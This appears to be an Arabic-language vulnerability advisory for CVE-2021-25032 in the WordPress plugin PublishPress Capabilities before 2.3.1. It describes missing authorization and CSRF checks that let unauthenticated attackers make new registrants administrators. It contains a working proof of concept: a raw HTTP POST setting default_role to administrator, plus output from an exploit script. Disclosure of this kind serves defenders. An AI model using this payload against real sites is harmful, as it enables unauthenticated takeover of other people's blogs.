
PublishPress Capabilities < 2.3.1 - تحديث خيارات تعسفي غير مصادق عليه يؤدي إلى اختراق المدونة
PublishPress Capabilities 2.2 - 2.3 - تحديث غير مصادق عليه لخيارات عشوائية يؤدي إلى اختراق المدونة
لا يمتلك المكوّن الإضافي فحوصات التفويض وCSRF عند تحديث إعداداته عبر خطاف init، ولا يضمن أن الخيارات المقرر تحديثها تخص المكوّن الإضافي. ونتيجةً لذلك، يمكن للمهاجمين غير المصادق عليهم تحديث خيارات عشوائية في المدونة، مثل الدور الافتراضي، وجعل أي مستخدم مسجّل جديد يتمتع بدور المسؤول.
POST /wp-admin/admin.php HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 81
Connection: close
page=pp-capabilities-settings&all_options=default_role&default_role=administrator
$ python3 CVE-2021-25032.py -u http://wordpress.lan
The plugin version is below 2.3.1.
The plugin version is 2.2
Vulnerability check: http://wordpress.lan
You can now register a user as an admin user. Remember to run --fix yes after you have registered to prevent others exploiting the site.
تعطيل التسجيل ودور المشترك
$ python3 CVE-2021-25032.py -u http://wordpress.lan --fix yes
Vulnerability check: http://wordpress.lan
Options set successfully: http://wordpress.lan/wp-admin/admin.php
Fixed: You can not longer register